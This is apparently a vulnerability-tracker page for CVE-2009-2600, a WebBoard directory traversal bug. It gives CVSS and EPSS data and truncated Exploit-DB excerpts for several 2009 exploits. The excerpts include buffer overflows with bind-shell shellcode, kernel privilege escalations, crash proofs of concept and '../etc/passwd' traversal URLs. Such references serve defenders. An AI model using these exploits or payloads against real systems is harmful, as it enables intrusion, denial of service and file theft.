CVE-2009-2600
published 2009-07-27CVE-2009-2600: Multiple directory traversal vulnerabilities in view.php in Webboard 2.90 beta and earlier allow remote attackers to read arbitrary files via a .. (dot dot) in…
PriorityP431medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
3.08%
86.0th percentile
Multiple directory traversal vulnerabilities in view.php in Webboard 2.90 beta and earlier allow remote attackers to read arbitrary files via a .. (dot dot) in the topic parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| akiva | webboard | <= 2.90 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft Windows - SMB2 Negotiate Protocol '0x72' Response Denial of Service
exploitdb·2010-05-07
CVE-2009-3103 Microsoft Windows - SMB2 Negotiate Protocol '0x72' Response Denial of Service
Microsoft Windows - SMB2 Negotiate Protocol '0x72' Response Denial of Service
---
#!/usr/bin/python
# === EDIT – this exploit appears to be exactly the same one of one which was already found
# and fixed notified by Laurent Gaffié, i did not know this but his blog post can be found here:
# http://g-laurent.blogspot.com/2009/11/windows-7-server-2008r2-remote-kernel.html
import socket,sys,time
print "Maliformed negotiate protocol response and quickly closing the connection causes Windows machines supporting SMB2 to crash (leaves the system hanging and unresponsive) -- tested on Win 7 build 2600"
print "Written by Jelmer de Hen"
print "Published at http://h.ackack.net/?p=387"
smb = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
smb.bind(("", 445))
smb.listen(1)
smbconn, addr = smb.acc
Exploit-DB
Linux Kernel 2.6.0 < 2.6.31 - 'pipe.c' Local Privilege Escalation (1)
exploitdb·2009-11-03
CVE-2009-3547 Linux Kernel 2.6.0 < 2.6.31 - 'pipe.c' Local Privilege Escalation (1)
Linux Kernel 2.6.0
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
/* First of all, im about to teach (hehe, just like mah nick) you mah powerful copy-and-past skillz */
// didn't really care about this. i mixed 2.6.0 to 2.6.31 :)
#define PIPE_BUFFERS (16)
struct __wait_queue_head {
int spinlock;
void *next, *prev; // struct list_head
};
struct fasync_struct { // bleh! didn't change from 2.6.0 to 2.6.31
int magic;
int fa_fd;
struct fasync_struct *fa_next;
void *file; // struct file
};
// this iz the w00t about 2.6.11 to 2.6.31
struct pipe_buf_operations {
int suce;
int *fptr[6];
};
// from 2.6.0 to 2.6.10
struct pipe_inode_info_2600_10 {
struct __wait_queue_head wait;
char *base; // !!!!!
unsigned int len; // !!!
Exploit-DB
BigAnt Server 2.50 - GET Remote Buffer Overflow (SEH)
exploitdb·2009-09-15
CVE-2009-4660 BigAnt Server 2.50 - GET Remote Buffer Overflow (SEH)
BigAnt Server 2.50 - GET Remote Buffer Overflow (SEH)
---
#!/usr/bin/python
# BigAnt Server version 2.50 SEH Overwrite - 0day
# Written and discovered by Blake
# Tested on Windows XP SP3
#
# $ ./bigant.py 192.168.1.131 6660
#
# [*] BigAnt Server v2.50 SEH Overwrite 0day
# [*] Written and discovered by Blake
# [*] Tested on Windows XP SP3
#
# [+] Connecting to 192.168.1.131 on port 6660
# [+] Sending payload
# [+] Connect to bind shell on port 4444
#
# $ nc 192.168.1.131 4444
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\WINDOWS\system32>
import socket, sys
if len(sys.argv)!= 3:
print "\n[*] Usage: %s \n" % sys.argv[0]
sys.exit(0)
host = sys.argv[1]
port = int(sys.argv[2]) # port 6660 by default
# windows/shell_bind_tcp - 696 bytes Encoder:
Exploit-DB
Audio Lib Player - '.m3u' Local Buffer Overflow (SEH)
exploitdb·2009-09-09
CVE-2009-3221 Audio Lib Player - '.m3u' Local Buffer Overflow (SEH)
Audio Lib Player - '.m3u' Local Buffer Overflow (SEH)
---
# Audio Lib Player m3u SEH overwrite
# product: http://www.toocharger.com/telecharger/logiciels/audio-lib-player/19056.htm
# Usage: Create playlist, load exploit.m3u and connect to shell on port 4444
#
# $ nc 192.168.1.131 4444
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Documents and Settings\blake\Desktop\ALP>
import sys
print "\n[*] Audio Lib Player m3u SEH Overwrite"
print "[*] Written by Blake"
print "[*] Tested on Windows XP SP3\n"
# windows/shell_bind_tcp - 695 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# EXITFUNC=seh, LPORT=4444, RHOST=
shellcode = (
"\xdd\xc1\xd9\x74\x24\xf4\x5f\x57\x59\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\
Exploit-DB
Microsoft Windows XP - 'win32k.sys' Local Privilege Escalation
exploitdb·2009-07-30
CVE-2009-2653 Microsoft Windows XP - 'win32k.sys' Local Privilege Escalation
Microsoft Windows XP - 'win32k.sys' Local Privilege Escalation
---
////////////////////////////////////////////////////////////////////////////////////
// +----------------------------------------------------------------------------+ //
// | | //
// | Microsoft Corporation - http://www.microsoft.com/ | //
// | | //
// | Affected Software: | //
// | Windows XP Service Pack 2 | //
// | Windows XP Service Pack 3 | //
// | | //
// | Affected Driver: | //
// | Multi-User Win32 Driver - win32k.sys <= 5.1.2600.5796 | //
// | | //
// | Local Privilege Escalation Exploit | //
// | For Educational Purposes Only ! | //
// | | //
// +----------------------------------------------------------------------------+ //
// | | //
// | NT Internals - http://www.ntinternals.org/ | //
// | alex ntinternals or
Exploit-DB
212Cafe WebBoard 2.90 Beta - 'view.php' Directory Traversal
exploitdb·2009-05-29
CVE-2009-2600 212Cafe WebBoard 2.90 Beta - 'view.php' Directory Traversal
212Cafe WebBoard 2.90 Beta - 'view.php' Directory Traversal
---
source: https://www.securityfocus.com/bid/44510/info
212cafe WebBoard is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
Remote attackers can use a specially crafted request with directory-traversal sequences ('../') to retrieve and read arbitrary files in the context of the webserver. Information harvested may aid in launching further attacks.
212cafe WebBoard 2.90 beta is vulnerable; other versions may also be affected.
http://www.example.com/webboard/view.php?topic=../../../../../../etc/passwd%00
http://www.example.com/webboard/view.php?topic=../../../../../../WINDOWS/system32/eula
Exploit-DB
212Cafe WebBoard 2.90 Beta - Remote File Disclosure
exploitdb·2009-05-29
CVE-2009-2600 212Cafe WebBoard 2.90 Beta - Remote File Disclosure
212Cafe WebBoard 2.90 Beta - Remote File Disclosure
---
Webboard <= v.2.90 beta Remote File Disclosure Vulnerability
Author: MrDoug
Email: mrdoug13 [at] gmail [dot] com
Greetz to all my friends
There are 3 vulnerable calls to fopen() in "/webboard/view.php"
They are on lines 7, 109 and 113. I have not actually read the
source but based on tests I would GUESS they look something
like this...
7: fopen('title/' . $_GET['topic'] . '.txt');
...
109: fopen('counter/read/' . $_GET['topic'] . '.txt');
...
113: fopen('counter/read/' . $_GET['topic'] . '.txt');
IMPORTANT:
Due to the trailing ".txt", retrieving files with different
extensions will be difficult unless you are able to get a
null byte through without it being escaped.
Example 1: /webboard/view.php?topic=../../../../../.
Exploit-DB
Microsoft Media Player - 'quartz.dll .mid' Denial of Service
exploitdb·2009-04-17
Microsoft Media Player - 'quartz.dll .mid' Denial of Service
Microsoft Media Player - 'quartz.dll .mid' Denial of Service
---
#!/usr/bin/perl
# CAL_quartz_mid_poc.pl
#
# MircoSoft_Media_player_quartz.dll_mid_remote_Dos POC
# by Code Audit Labs public 2009-04-17
# http://www.vulnhunt.com/
#
#Affected
#========
#test on full updated winxp sp3
#windows media Player 10.00.00.3998 quartz.dll 6.5.3790.4283
#Windows Media Player 11.0.5721.5230 quartz.dll 6.5.2600.5596
#other version should be affected
# CVE: please assign to this a CVE id
#
#ANALYSIS
#========
# one vulnerability exists within the quartz.dll code processing RMID header
#the struct have following
#{
# char riff_id[4]; //'RIFF'
# DWORD rmid_size;
# char rmid_id[4]; //'RMID'
# char data_id[4]; //no eq data
# DWORD midi_size;
#}
#if data_id is not 'data' , and midi_size is 0xfffffff8.
#the
Exploit-DB
Microsoft Media Player - 'quartz.dll .wav' Multiple Remote Denial of Service Vulnerabilities
exploitdb·2009-04-17
Microsoft Media Player - 'quartz.dll .wav' Multiple Remote Denial of Service Vulnerabilities
Microsoft Media Player - 'quartz.dll .wav' Multiple Remote Denial of Service Vulnerabilities
---
#!/usr/bin/perl
# CAL_2_quartz_wav_poc.pl
#
# Two_MircoSoft_Media_player_quartz.dll_wav_remote_Dos_vulnerabilities
# by Code Audit Labs public 2009-04-19
## http://www.vulnhunt.com/
#
#Affected
#========
#test on full updated winxp sp3
#windows media Player 10.00.00.3998 quartz.dll 6.5.3790.4283
#Windows Media Player 11.0.5721.5230 quartz.dll 6.5.2600.5596
#other version should be affected
# CVE: please assign to this a CVE id
#
##ANALYSIS
#=======
# not provide
open(Fin, ">poc.wav") || die "can't create crash sample.$!";
binmode(Fin);
$data =
"\x52\x49\x46\x46\xc2\x58\x01\x00\x57\x41\x56\x45\x44\x44\x44\x44" .
"\xf8\xff\xff\xff\x01\x00\x01\x00\x22\x56\x00\x00\x44\xac\x00\x00" .
"\x02\x00\
Exploit-DB
POP Peeper 3.4.0.0 - Date Remote Buffer Overflow
exploitdb·2009-03-12
CVE-2009-1029 POP Peeper 3.4.0.0 - Date Remote Buffer Overflow
POP Peeper 3.4.0.0 - Date Remote Buffer Overflow
---
#!/usr/bin/perl
# KL0309EXP-poppeeper_date-bof.pl
# 03.12.2009
# Krakow Labs Development [www.krakowlabs.com]
# POP Peeper 3.4.0.0 Date Remote Buffer Overflow Exploit
#
# SEH overwrite exploitation, uses Imap.dll (included with POP Peeper) for universal
# exploitation (more love for no /SafeSEH). Tested on Windows XP SP3.
#
# rush@KL (Jeremy Brown) [[email protected]]
#
# rush@linux:~$ sudo perl KL0309EXP-poppeeper_date-bof.pl
# xx.xx.xx.xx
# rush@linux:~$ nc xx.xx.xx.xx 55555
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\POP Peeper>exit
# exit
# rush@linux:~$
#
# Associated Files & Information:
# http://www.krakowlabs.com/res/adv/KL0309ADV-poppeeper_date-bof.txt
# http://www
No writeups or analysis indexed.
2009-07-27
Published